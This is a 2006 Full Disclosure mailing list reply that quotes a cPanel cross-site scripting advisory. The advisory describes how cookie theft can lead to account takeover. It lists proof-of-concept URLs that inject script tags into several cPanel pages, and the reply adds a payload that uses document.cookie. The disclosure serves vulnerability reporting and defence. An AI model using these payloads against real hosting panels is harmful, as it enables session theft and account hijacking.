Full Disclosure mailing list archives
Re: cPanel Multiple Cross Site Scripting Vulnerability
From: Sumit Siddharth <sumit.siddharth () gmail com>
Date: Wed, 8 Feb 2006 11:15:56 +0530
One more to ur list http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder Sumit On 2/4/06, Hamish Stanaway <koremeltdown () hotmail com> wrote:
Hi there, Thank you for finding this vulnerability in a widely used software. I was wondering if you had a solution or a work around to this issue? Kindest of regards, Hamish Stanaway, CEO Absolute Web Hosting / -= KoRe WoRkS =- Internet Security Auckland, New Zealand http://www.webhosting.net.nz http://www.buywebhosting.co.nz http://www.koreworks.comFrom: simo () morx org To: bugtraq () securityfocus com Subject: cPanel Multiple Cross Site Scripting Vulnerability Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT) MIME-Version: 1.0 Received: from outgoing.securityfocus.com ([205.206.231.27]) by bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri,3Feb 2006 08:56:14 -0800 Received: from outgoing.securityfocus.com by outgoing.securityfocus.com via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3Feb2006 08:33:09 -0800 Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid 803C22370A5; Fri, 3 Feb 2006 08:16:33 -0700 (MST) Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000 X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA= Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-help () securityfocus com> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com> Delivered-To: mailing list bugtraq () securityfocus com Delivered-To: moderator for bugtraq () securityfocus com User-Agent: SquirrelMail/1.4.4 X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com X-AntiAbuse: Original Domain - securityfocus.com X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12] X-AntiAbuse: Sender Address Domain - morx.org X-Source: X-Source-Args: X-Source-Dir: Return-Path: bugtraq-return-23195-koremeltdown=hotmail.com () securityfocus com X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC) FILETIME=[BE6AAD60:01C628E2] Title: cPanel Multiple Cross Site Scripting Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org> Discovered: 22 january 2005 Published: 02 february 2006 MorX Security Research Team http://www.morx.org Service: Web Hosting Manager Vendor: cPanel Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks Severity: Medium/High Details: cPanel (control panel) is a graphical web-based management tool, designed to make administration of web sites as easy as possible. cPanel handles all aspects of website administration in an easy-to-use interface. The software, which is proprietary, runs on a number of popular RPM-based Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly accessed on ports 2082 and 2083 (for a SSL version). Authentication is either via HTTP or web page login. cPanel is prone to cross-sitescriptingattacks. This problem is due to a failure in the application to properly sanitize user-supplied input Impact: an attacker can exploit the vulnerable scripts to have arbitrary script code executed in the browser of an authentified cPanel user in thecontextof the website hosting the vulnerable cPanel version. resulting in the theft of cookie-based authentication giving the attacker full access to the victim's cPanel account as well as other type of attacks. Affected scripts with proof of concept exploit:http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email= <script>alert('vul')</script>&domain=http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email= <script>alert('vul')</script>&domain=xxxhttp://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0 "><script>alert('vul')</script>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxxhttp://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xxx&target=xxxhttp://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxxDisclaimer: this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/Account. I cannot be held responsible for any of the above.
--
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: cPanel Multiple Cross Site Scripting Vulnerability Sumit Siddharth (Feb 07)